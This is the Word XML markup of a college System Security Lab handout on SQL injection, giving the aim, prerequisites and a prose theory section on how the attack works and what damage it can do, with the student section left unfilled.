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31.20000000000005" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:b w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:b w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Terna Engineering College</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr>
        <w:spacing w:after="0" w:line="288" w:lineRule="auto"/>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Computer Engineering Department</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000003">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004">
      <w:pPr>
        <w:spacing w:after="0" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Class: TE                                                                   Sem.: VI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:spacing w:after="0" w:line="288" w:lineRule="auto"/>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Course: System Security Lab</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:spacing w:line="331.20000000000005" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:b w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:b w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PART A</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009">
      <w:pPr>
        <w:spacing w:line="331.20000000000005" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(PART A: TO BE REFERRED BY STUDENTS)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000A">
      <w:pPr>
        <w:spacing w:line="331.20000000000005" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:b w:val="1"/>
          <w:color w:val="7030a0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:b w:val="1"/>
          <w:color w:val="7030a0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Experiment No.08</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">
      <w:pPr>
        <w:spacing w:after="0" w:line="331.20000000000005" w:lineRule="auto"/>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A.1 Aim: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C">
      <w:pPr>
        <w:spacing w:after="0" w:line="331.20000000000005" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Perform SQL injection on a vulnerable website.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A.2 Prerequisite:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"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Basic Knowledge of SQL queries, HTML/PHP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"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10">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>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A.3 Outcome: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011">
      <w:pPr>
        <w:spacing w:after="0"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After successful completion of this experiment, students will be able to set up firewalls and intrusion detection systems using open source technologies and explore email security and explore various attacks like buffer overflow, SQL injection and web application attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:b w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>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A.4 Theory: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014">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both"/>
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL Injection (SQLi) is a type of</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">injection attack that makes it possible to execute malicious SQL statements. These statements control a database server behind a web application. Attackers can use SQL Injection vulnerabilities to bypass application security measures. They can go around authentication and authorization of a web page or web application and retrieve the content of the entire SQL database. They can also use SQL Injection to add, modify, and delete records in the database.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015">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both"/>
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">An SQL Injection vulnerability may affect any website or web application that uses an SQL database such as MySQL, Oracle, SQL Server, or others. Criminals may use it to gain unauthorized access to your sensitive data: customer information, personal data, trade secrets, intellectual property, and more. SQL Injection attacks are one of the oldest, most prevalent, and most dangerous web application vulnerabilities. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">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both"/>
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To make an SQL Injection attack, an attacker must first find vulnerable user inputs within the web page or web application. A web page or web application that has an SQL Injection vulnerability uses such user input directly in an SQL query. The attacker can create input content. Such content is often called a malicious payload and is the key part of the attack. After the attacker sends this content, malicious SQL commands are executed in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">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150" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="0" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL is a query language that was designed to manage data stored in relational databases. You can use it to access, modify, and delete data. Many web applications and websites store all the data in SQL databases. In some cases, you can also use SQL commands to run operating system commands. Therefore, a successful SQL Injection attack can have very serious consequences.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720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="0" w:before="280" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Attackers can use SQL Injections to find the credentials of other users in the database. They can then impersonate these users. The impersonated user may be a database administrator with all database privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="0" w:before="280" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL lets you select and output data from the database. An SQL Injection vulnerability could allow the attacker to gain complete access to all data in a database server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="0" w:before="280" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL also lets you alter data in a database and add new data. For example, in a financial application, an attacker could use SQL Injection to alter balances, void transactions, or transfer money to their account.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="0" w:before="280" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can use SQL to delete records from a database, even drop tables. Even if the administrator makes database backups, deletion of data could affect application availability until the database is restored. Also, backups may not cover the most recent data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="0" w:before="280" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In some database servers, you can access the operating system using the database server. This may be intentional or accidental. In such a case, an attacker could use an SQL Injection as the initial vector and then attack the internal network behind a firewall.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>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23">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>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24">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>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25">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:jc w:val="center"/>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26">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:jc w:val="center"/>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27">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:b w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PART B</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000028">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(PART B: TO BE COMPLETED BY STUDENTS)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000029">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
